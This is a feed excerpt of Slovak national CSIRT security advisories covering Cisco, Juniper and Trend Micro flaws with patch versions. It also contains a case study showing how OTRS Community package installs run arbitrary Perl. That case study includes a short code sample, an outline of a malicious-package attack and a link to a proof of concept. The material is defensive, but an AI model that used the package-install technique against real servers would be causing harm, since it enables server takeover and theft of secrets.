<p>Zraniteľnosť v rozhraní API súvisiaca so spôsobom narábania so súbormi. Vzdialený autentifikovaný útočník s oprávneniami „read-only“ ju môže zneužiť na prepísanie ľubovoľných súborov na lokálnom súborovom systéme a získanie oprávnení „vmanage“. Na to potrebuje nahrať do systému škodlivý súbor.</p>



<p><strong>Zraniteľnosť je aktívne zneužívaná.</strong></p>



<p><strong>CVE-2026-20126</strong> (CVSS skóre 7,8)</p>



<p>Zraniteľnosť autentifikačného mechanizmu REST API umožňuje navýšiť oprávnenia na úroveň používateľa root. Autentifikovaný útočník s nízkymi oprávneniami ju môže zneužiť zaslaním špeciálne vytvorenej požiadavky na REST API.</p>



<p><strong>CVE-2026-20128</strong> (CVSS skóre 5,5)</p>



<p>Zraniteľnosť v komponente Data Collection Agent (DCA) vyplýva z prítomnosti súboru s prihlasovacími údajmi pre používateľa DCA v systéme. Lokálny autentifikovaný útočník s oprávneniami „vmanage“ tak môže získať oprávnenia DCA.</p>



<p><strong>Zraniteľnosť je aktívne zneužívaná.</strong></p>



<p><strong>CVE-2026-20129</strong> (CVSS skóre 9,8)</p>



<p>Zraniteľnosť súvisiaca s nevhodnou autentifikáciou požiadaviek na rozhranie API. Vzdialený neautentifikovaný útočník dokáže jej zneužitím vykonávať príkazy s oprávneniami používateľa „netadmin“.</p>



<p><strong>CVE-2026-20133</strong> (CVSS skóre 7,5)</p>



<p>Zraniteľnosť vyplývajúca z nedostatočných obmedzení prístupu k súborovému systému. Vzdialený neautentifikovaný útočník získa po jej zneužití cez rozhranie API možnosť čítať citlivé informácie zo systému.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Cisco Catalyst SD-WAN Manager aspoň na verziu 20.9.8.2, 20.12.5.3, 20.12.6.1, 20.15.4.2 alebo 20.18.2.1.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3194/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v Cisco Secure FMC a SCC umožňujú vzdialené vykonanie kódu</title>
		<link>/posts/3192</link>
					<comments>/posts/3192#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Mar 2026 16:02:46 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Cisco Secure FMC]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3192</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco vydala bezpečnostné aktualizácie nástroja pre manažment firewallov Secure Firewall Management Center (FMC) a Security Cloud Control (SCC) Firewall...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco vydala bezpečnostné aktualizácie nástroja pre manažment firewallov Secure Firewall Management Center (FMC) a Security Cloud Control (SCC) Firewall Management, ktoré opravujú 2 kritické zraniteľnosti umožňujúce obídenie prihlásenia, eskaláciu oprávnení a vzdialené vykonanie kódu.</strong><br><strong>[Aktualizácia 19.3.2026] jedna zo zraniteľností bola zneužívaná ako zero-day od januára.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Secure Firewall Management Center (FMC) 6.4.0.13&nbsp;staršie ako&nbsp;7.0.9</li>



<li>Cisco Secure Firewall Management Center (FMC) 7.0.0&nbsp;staršie ako&nbsp;7.0.9</li>



<li>Cisco Secure Firewall Management Center (FMC) 7.1.0&nbsp;staršie ako&nbsp;7.2.11</li>



<li>Cisco Secure Firewall Management Center (FMC) 7.3.0&nbsp;staršie ako&nbsp;7.4.6</li>



<li>Cisco Secure Firewall Management Center (FMC) 7.6.0&nbsp;staršie ako&nbsp; 7.6.5</li>



<li>Cisco Secure Firewall Management Center (FMC) 7.7.0&nbsp;staršie ako&nbsp; 7.7.12</li>



<li>Cisco Secure Firewall Management Center (FMC) 10.0.0&nbsp;staršie ako&nbsp; 10.0.1</li>



<li>Cisco Security Cloud Control (SCC) Firewall Management</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2026-20079 </strong>(CVSS 3.1 skóre 10.0)</p>



<p>Kritická zraniteľnosť CVE-2026-20079 spočíva v existencii nesprávneho systémového procesu, ktorý sa vytvorí pri bootovaní zariadenia. Vzdialený neautentifikovaný útočník by ju mohol zneužiť zaslaním špeciálne vytvorených HTTP požiadaviek na obídenie autentifikácie a vykonanie skriptov a príkazov umožňujúcich získanie administrátorského prístupu do systému.</p>



<p><strong>CVE-2026-20131 </strong>(CVSS 3.1 skóre 10.0)</p>



<p>Kritická zraniteľnosť s&nbsp;označením CVE-2026-20131 spočíva v&nbsp;nezabezpečenej deserializácii používateľských vstupov. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu Java s&nbsp;oprávneniami používateľa root. Na to potrebuje poslať špeciálne vytvorený serializovaný objekt Java na webové manažmentové rozhranie zraniteľného zariadenia.</p>



<p><em>[Aktualizácia 19.3.2026] </em><br><em>Ransomvérová skupina Interlock aktívne zneužívala kritickú zero-day zraniteľnosť CVE-2026-20131 v softvéri Cisco Secure Firewall Management Center už od konca januára 2026, približne mesiac pred jej zverejnením a opravou.</em></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong><strong></strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong><strong></strong></li>



<li><strong>Eskalácia oprávnení</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca administrátorom odporúča bezodkladnú aktualizáciu zraniteľných verzií Cisco Secure Firewall Management Center (FMC) aspoň na verzie 7.0.9, 7.2.11, 7.4.6, 7.6.5, 7.7.12 alebo 10.0.1.</p>



<p>Zraniteľnosti v&nbsp;službe Cisco Security Cloud Control (SCC) Firewall Management opravila spoločnosť automaticky.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2026-20079">https://www.cve.org/CVERecord?id=CVE-2026-20079</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20131">https://nvd.nist.gov/vuln/detail/CVE-2026-20131</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-rce-NKhnULJh">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-rce-NKhnULJh</a></li>



<li><a href="https://threatprotect.qualys.com/2026/03/05/cisco-patches-secure-firewall-management-center-software-vulnerabilities-cve-2026-20079-cve-2026-20131/">https://threatprotect.qualys.com/2026/03/05/cisco-patches-secure-firewall-management-center-software-vulnerabilities-cve-2026-20079-cve-2026-20131/</a></li>



<li><a href="https://aws.amazon.com/blogs/security/amazon-threat-intelligence-teams-identify-interlock-ransomware-campaign-targeting-enterprise-firewalls/">https://aws.amazon.com/blogs/security/amazon-threat-intelligence-teams-identify-interlock-ransomware-campaign-targeting-enterprise-firewalls/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3192/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Keď z administrátorských funkcií vznikne RCE: prípadová štúdia OTRS Community Package Design</title>
		<link>/posts/3187</link>
					<comments>/posts/3187#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 05 Mar 2026 14:22:32 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[OTRS]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=3187</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/03/OTRS-1024x613.png" alt="" /></p>Bezpečnostní analytici CSIRT.SK objavili chybu v dizajne tiketovacieho systému OTRS Community. Táto bezpečnostná chyba umožňuje vykonávanie ľubovoľného kódu. Úvod Väčšina...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/03/OTRS-1024x613.png" alt="" /></p>
<p><strong>Bezpečnostní analytici CSIRT.SK objavili chybu v dizajne tiketovacieho systému OTRS Community. Táto bezpečnostná chyba umožňuje vykonávanie ľubovoľného kódu.</strong></p>



<h2 class="wp-block-heading">Úvod</h2>



<p>Väčšina moderných webových aplikácií funguje na základe predpokladu, že nikomu nemožno úplne dôverovať, ani administrátorom. Niektoré architektonické rozhodnutia však administrátorom stále poskytujú možnosti, ktoré efektívne stierajú hranicu medzi <em>správou</em> a <em>vykonávaním ľubovoľného kódu</em>.</p>



<p>V tomto príspevku budem analyzovať rozhodnutie týkajúce sa dizajnu v&nbsp;tiketovacom nástroji OTRS Community: možnosť administrátorov inštalovať balíky rozšírení (<code>.opm</code>), ktoré môžu počas inštalácie vykonávať ľubovoľný kód Perl.</p>



<p>Nejedná sa o zraniteľnosť v klasickom zmysle. Neexistuje žiadne obídenie overovania, žiadna chyba umožňujúca injektovanie a žiadny únik zo sandboxu.</p>



<p>Je to však <strong>nebezpečný dizajnový vzorec</strong>, ktorý mení <em>prístup administrátora</em> na <em>vykonávanie príkazov na serveri</em>, pričom operátori si často neuvedomujú bezpečnostné dôsledky.</p>



<p>Príklad demonštrujúci toto správanie (PoC) si môžete pozrieť v mojom repozitári GitHub: [OTRS Community PoC Repository] <br>(<a href="https://github.com/Habuon/exploits/tree/main/otrs">https://github.com/Habuon/exploits/tree/main/otrs</a>)</p>



<h2 class="wp-block-heading">Pozadie: OTRS Community Package Management</h2>



<p>OTRS Community podporuje formát balíkov (<code>.opm</code>), ktoré slúžia na rozšírenie systému o nové funkcie. Tieto balíky môžu definovať logiku inštalácie pomocou blokov <code>&lt;CodeInstall></code>:</p>



<p><code>```xml<br>&lt;CodeInstall&gt;&lt;![CDATA[<br>&nbsp;&nbsp;&nbsp; use strict;<br>&nbsp;&nbsp;&nbsp; use warnings;<br>&nbsp;&nbsp;&nbsp; # arbitrary Perl code<br>]]&gt;&lt;/CodeInstall&gt;<br>```</code></p>



<p>Tento kód sa automaticky vykoná, keď správca nainštaluje balík prostredníctvom webového rozhrania.</p>



<p>Z hľadiska funkčnosti to dáva zmysel:</p>



<ul>
<li>Balíky musia modifikovať konfiguráciu</li>



<li>Môžu potrebovať inštalovať súbory</li>



<li>Môžu potrebovať interagovať so systémom</li>
</ul>



<p>Z hľadiska bezpečnosti to však znamená:</p>



<ul>
<li>Inštalácia balíka = vykonanie ľubovoľného kódu na strane servera.</li>
</ul>



<h2 class="wp-block-heading">Detaily konceptu</h2>



<p>Škodlivý balík môže do svojej inštalačnej rutiny vložiť vykonanie príkazov operačného systému:</p>



<p><code>```perl<br>my $content = `id`;<br>```</code></p>



<p>Tento príkaz sa vykonáva v kontexte používateľa spúšťajúceho službu OTRS Community.</p>



<p>S minimálnym kódom dokáže:</p>



<ul>
<li>Vykonávať ľubovoľné príkazy shellu</li>



<li>Zapisovať výstup do koreňového adresára webu</li>



<li>Vytvoriť perzistenciu</li>



<li>Exfiltrovať tajomstvá</li>



<li>Nasadzovať zadné vrátka</li>
</ul>



<p>Ukážkový kód Python (PoC) automatizuje tento proces:</p>



<ol>
<li>Prihlásením sa ako správca</li>



<li>Nahratím upraveného súboru <code>.opm</code></li>



<li>Spustením inštalácie</li>



<li>Načítaním výstupu príkazu</li>
</ol>



<p>Úplný ukážkový kód si môžete pozrieť v mojom repozitári GitHub tu: [OTRS Community PoC Repository] <br>(<a href="https://github.com/Habuon/exploits/tree/main/otrs">https://github.com/Habuon/exploits/tree/main/otrs</a>)</p>



<p>Nie sú potrebné žiadne reťazce exploitov. Žiadne poškodenie pamäte. Žiadna chyba deserializácie. Len zamýšľaná funkcia.</p>



<h2 class="wp-block-heading">Prečo to nie je CVE</h2>



<p>Toto správanie je:</p>



<ul>
<li>Autentifikované</li>



<li>Zamýšľané</li>



<li>Súčasťou dizajnu systému</li>
</ul>



<p>Preto podľa väčšiny definícií nejde o zraniteľnosť.</p>



<p>„Nie je to zraniteľnosť“ však neznamená „bezpečný dizajn“.</p>



<h2 class="wp-block-heading">Dopad na bezpečnosť</h2>



<p>Tento dizajn spôsobuje zrútenie vrstiev privilégií:</p>



<figure class="wp-block-table"><table><tbody><tr><td><strong>Vrstva</strong></td><td><strong>Zamýšľané</strong></td></tr><tr><td>Webový administrátor</td><td>Kontrola aplikácie</td></tr><tr><td>Systémový používateľ</td><td>Exekúcia na úrovni OS</td></tr></tbody></table></figure>



<p>Tým, že umožňujú vykonávanie ľubovoľného kódu v rámci rutiny inštalácie balíka, sa tieto dve vrstvy stávajú ekvivalentnými.</p>



<p>V praxi to znamená:</p>



<ul>
<li>Kompromitovanie administrátora OTRS Community = kompromitovanie servera.</li>
</ul>



<p>Tým sa porušuje kľúčový bezpečnostný princíp:</p>



<p><strong>Administrátorské oprávnenie ≠ vykonávanie ľubovoľného kódu.</strong></p>



<h2 class="wp-block-heading">Porovnanie s&nbsp;inými platformami</h2>



<p>Moderné modulové systémy (WordPress, prehliadače, IDE) čoraz viac:</p>



<ul>
<li>Obmedzujú rozšírenia (sandboxing)</li>



<li>Obmedzujú prístup k súborovému systému</li>



<li>Zakazujú hooky na vykonávanie surového kódu</li>



<li>Používajú deklaratívne kroky inštalácie</li>
</ul>



<p>Model OTRS Community má bližšie k:</p>



<ul>
<li>„Spustite tento skript Perl ako súčasť inštalácie.“</li>
</ul>



<p>Čo je výkonné, ale extrémne nebezpečné.</p>



<h2 class="wp-block-heading">Získané poučenie</h2>



<ol>
<li><strong>Podpísané alebo dôveryhodné rozšírenia nie sú štandardne bezpečné</strong> – dôvera by sa mala minimalizovať, nie maximalizovať.</li>



<li><strong>Administrátorské panely by nemali byť shellovými rozhraniami</strong> – účet webového administrátora by nemal implicitne povoľovať vykonávanie príkazov operačného systému.</li>



<li><strong>Systémy rozšírení by mali byť deklaratívne, nie imperatívne</strong> – inštalácia by mala popisovať, <em>čo</em> treba urobiť, nie <em>ako vykonávať kód</em>.</li>



<li><strong>Dopad po overení je dôležitý</strong> – mnohé kompromitácie začínajú odcudzením prihlasovacích údajov.</li>
</ol>



<h2 class="wp-block-heading">Odporúčanie pre obranu</h2>



<p>Ak prevádzkujete inštanciu OTRS: Community</p>



<ul>
<li>Prísne obmedzte administrátorské účty</li>



<li>Kompromitáciu administrátorského účtu považujte za úplnú kompromitáciu servera</li>



<li>Nevystavujte administrátorské rozhranie OTRS Community do verejného internetu</li>



<li>Používajte izoláciu na úrovni operačného systému (kontajnery, chroot, SELinux, AppArmor)</li>



<li>Monitorujte aktivitu inštalácie balíkov</li>



<li>Zvážte použitie súborového systému len na čítanie pre webové procesy, kde je to možné</li>
</ul>



<h2 class="wp-block-heading">Záver</h2>



<p>Táto prípadová štúdia sa netýka zraniteľnosti. Týka sa voľby dizajnu, ktorá vedie k nebezpečnému narušeniu bezpečnostných princípov.</p>



<p>Keď systémy rozšírení umožňujú vykonávanie ľubovoľného kódu počas inštalácie, správcovia už nie sú len správcami – stávajú sa používateľmi shellu.</p>



<p>V kontrolovaných prostrediach to môže byť prijateľné, ale malo by to byť explicitne dané a zrozumiteľné riziko. </p>



<p><strong>Najnebezpečnejšie chyby nie sú niekedy vôbec chybami – sú to funkcie.</strong></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3187/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností február 2026</title>
		<link>/posts/3158</link>
					<comments>/posts/3158#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 03 Mar 2026 15:01:24 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=3158</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci február 2026....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci február 2026.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2026/03/2026_02_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 02/2026 PDF (606 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3158/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Junos OS Evolved dovoľuje vykonávať kód ako root</title>
		<link>/posts/3146</link>
					<comments>/posts/3146#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 02 Mar 2026 10:27:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Juniper]]></category>
		<category><![CDATA[Junos OS Evolved]]></category>
		<category><![CDATA[PTX]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3146</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/Juniper_Networks-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Juniper Networks opravila kritickú zraniteľnosť platformy On-Box Anomaly Detection vo svojich routeroch série PTX. Zraniteľnosť umožňuje bez autentifikácie vzdialene...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/Juniper_Networks-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Juniper Networks opravila kritickú zraniteľnosť platformy On-Box Anomaly Detection vo svojich routeroch série PTX. Zraniteľnosť umožňuje bez autentifikácie vzdialene vykonávať kód s&nbsp;oprávneniami používateľa root.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Junos OS Evolved 25.4 PTX Series staršie ako 25.4R1-S1-EVO, 25.4R2-EVO</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-21902</strong> (CVSS v4.0 skóre 9,3)</p>



<p>Spoločnosť Juniper Networks vydala bezpečnostné aktualizácie pre kritickú zraniteľnosť Junos OS Evolved PTX Series. Chyba zabezpečenia sa nachádza v súčasti On-Box Anomaly Detection a súvisí s nevhodným prideľovaním oprávnení. Neautentifikovanému útočníkovi umožňuje vzdialene vykonávať kód s oprávneniami používateľa root.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Junos OS Evolved 25.4 PTX Series aspoň na verziu 25.4R1-S1-EVO, 25.4R2-EVO alebo 26.2R1-EVO.</p>



<p>Pre mitigovanie zraniteľnosti povoľte prístup k On-Box Anomaly Detection len z dôveryhodných sietí a zariadení, prípadne zakážte službu príkazom „request pfe anomalies disable“.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://supportportal.juniper.net/s/article/2026-02-Out-of-Cycle-Security-Bulletin-Junos-OS-Evolved-PTX-Series-A-vulnerability-allows-a-unauthenticated-network-based-attacker-to-execute-code-as-root-CVE-2026-21902">https://supportportal.juniper.net/s/article/2026-02-Out-of-Cycle-Security-Bulletin-Junos-OS-Evolved-PTX-Series-A-vulnerability-allows-a-unauthenticated-network-based-attacker-to-execute-code-as-root-CVE-2026-21902</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/">https://www.bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3146/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Riešenie advanced endpoint security od TrendAI obsahuje kritické zraniteľnosti</title>
		<link>/posts/3143</link>
					<comments>/posts/3143#respond</comments>
		
		<dc:creator><![CDATA[Dávid Polakovič]]></dc:creator>
		<pubDate>Mon, 02 Mar 2026 10:25:55 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apex One]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Trend Micro]]></category>
		<category><![CDATA[TrendAI]]></category>
		<guid isPermaLink="false">/?p=3143</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/03/TrendAI.png" alt="" /></p>Spoločnosť TrendAI (nové meno vetvy spoločnosti Trend Micro enterprise business) vydalo bezpečnostné aktualizácie pre svoje riešenie advanced endpoint security Apex...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/03/TrendAI.png" alt="" /></p>
<p><strong>Spoločnosť TrendAI (nové meno vetvy spoločnosti Trend Micro enterprise business) vydalo bezpečnostné aktualizácie pre svoje riešenie advanced endpoint security Apex One. Tie opravujú 8 zraniteľností z&nbsp;ktorých 2 sú vyhodnotené ako kritické.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apex One 2019 (On-prem) pre Windows</li>



<li>Apex One SaaS pre Windows</li>



<li>Trend Vision One Endpoint &#8211; Standard Endpoint Protection SaaS pre Windows</li>



<li>Apex One SaaS pre Mac</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-71210 </strong>(CVSS 3 skóre 9,8)</p>



<p>Zraniteľnosť v správcovskej konzole Trend Micro Apex One umožňuje neprivilegovaným útočníkom prechádzať cestami, nahrať a spustiť škodlivý kód. Pre jej zneužitie potrebuje útočník prístup ku konzole.</p>



<p><strong>CVE-2025-71211 </strong>(CVSS 3 skóre 9,8)</p>



<p>Zraniteľnosť rovnakého typu ako CVE-2025-71210 ale pre odlišný spustiteľný súbor správcovskej konzoly Trend Micro Apex One.</p>



<p><strong>CVE-2025-71212 </strong>(CVSS 3 skóre 7,8)</p>



<p>Zraniteľnosť typu link following v skenovacom prvku riešenia Trend Micro Apex One umožňuje lokálnemu útočníkovi eskalovať oprávnenia.</p>



<p><strong>CVE-2025-71213 </strong>(CVSS 3 skóre 7,8)</p>



<p>Zraniteľnosť spôsobená chybou validácie pôvodu v riešení Trend Micro Apex One môže umožniť lokálnemu útočníkovi eskalovať oprávnenia.</p>



<p><strong>CVE-2025-71214 </strong>(CVSS 3 skóre 7,2)</p>



<p>Zraniteľnosť spôsobená chybou validácie pôvodu v službe iCore agenta Trend Micro Apex One pre macOS dovoľuje lokálnemu útočníkovi eskalovať oprávnenia.</p>



<p><strong>CVE-2025-71215 </strong>(CVSS 3 skóre 7,8)</p>



<p>Zraniteľnosť typu time-of-check to time-of-use (TOCTOU) pri overovaní podpisu v službe iCore agenta Trend Micro Apex One pre Mac umožňuje lokálnemu útočníkovi eskalovať oprávnenia.</p>



<p><strong>CVE-2025-71216 </strong>(CVSS 3 skóre 7,8)</p>



<p>Zraniteľnosť typu <em>time-of-check to time-of-use</em> (TOCTOU) v mechanizme vyrovnávacej pamäte agenta Trend Micro Apex One pre Mac môže umožniť lokálnemu útočníkovi eskalovať oprávnenia.</p>



<p><strong>CVE-2025-71217 </strong>(CVSS 3 skóre 7,8)</p>



<p>Zraniteľnosť spôsobená chybou validácie pôvodu v mechanizme sebaochrany agenta Trend Micro Apex One pre Mac dovoľuje lokálnemu útočníkovi eskalovať oprávnenia.</p>



<p>Zraniteľnosti CVE-2025-71212 až CVE-2025-71217 vyžadujú pre zneužitie schopnosť vykonávať kód s&nbsp;nízkymi oprávneniami.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Narušenie dôveryhodnosti systému</strong></li>



<li><strong>Únik citlivých dát a informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Systémovým administrátorom odporúčame bezodkladne aplikovať bezpečnostné aktualizácie (Critical Patch Build 14136 pre riešenia on-prem a Security Agent Build 14.0.20315 pre SaaS), dostupné priamo v&nbsp;aplikácii výrobcu. Zároveň sa odporúča pred každou aktualizáciou preveriť nutnosť inštalácie dodatočného softvéru (ako napríklad servisných balíčkov) priamo na stránke výrobcu v&nbsp;sekcii <a href="https://www.trendmicro.com/en_gb/business/products/downloads.html?regs=uk">„Download Center“</a>.</p>



<p>Zákazníci, ktorí majú IP adresu svojej konzoly vystavenú do verejného prostredia, by mali zvážiť zavedenie nápravných opatrení, ako sú napríklad obmedzenia zdrojových adries.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://success.trendmicro.com/en-US/solution/KA-0022458">https://success.trendmicro.com/en-US/solution/KA-0022458</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/trend-micro-warns-of-critical-apex-one-rce-vulnerabilities/">https://www.bleepingcomputer.com/news/security/trend-micro-warns-of-critical-apex-one-rce-vulnerabilities/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3143/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Cisco Catalyst SD-WAN Controller/Manager</title>
		<link>/posts/3141</link>
					<comments>/posts/3141#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 02 Mar 2026 10:23:24 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Catalyst SD-WAN Controller]]></category>
		<category><![CDATA[Catalyst SD-WAN Manager]]></category>
		<category><![CDATA[Cisco]]></category>
		<guid isPermaLink="false">/?p=3141</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco opravila kritickú zraniteľnosť vo&#160;svojom produkte Catalyst SD-WAN Controller/Manager. Chybu zabezpečenia aktívne zneužívajú útočníci na obídenie autentifikácie a&#160;získanie prístupu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco opravila kritickú zraniteľnosť vo&nbsp;svojom produkte Catalyst SD-WAN Controller/Manager. Chybu zabezpečenia aktívne zneužívajú útočníci na obídenie autentifikácie a&nbsp;získanie prístupu ku konfiguračnému rozhraniu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Catalyst SD-WAN Controller a Manager verzií starších ako 20.9.8.2, 20.12.5.3, 20.12.6.1, 20.15.4.2 a 20.18.2.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-20127</strong> (CVSS skóre 10,0)</p>



<p>Aktívne zneužívaná kritická zraniteľnosť Cisco Catalyst SD-WAN Controller / Manager sa nachádza v autentifikačnom mechanizme. Vzdialenému útočníkovi umožňuje obísť autentifikáciu a získať administrátorské oprávnenia pomocou špeciálne vytvorených požiadaviek, ktoré pošle na zraniteľný systém. Po získaní prístupu do účtu môže následne pristupovať ku konfiguračnému rozhraniu siete NETCONF.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Cisco Catalyst SD-WAN na verziu 20.9.8.2, 20.12.5.3, 20.12.6.1, 20.15.4.2, alebo 20.18.2.1.</p>



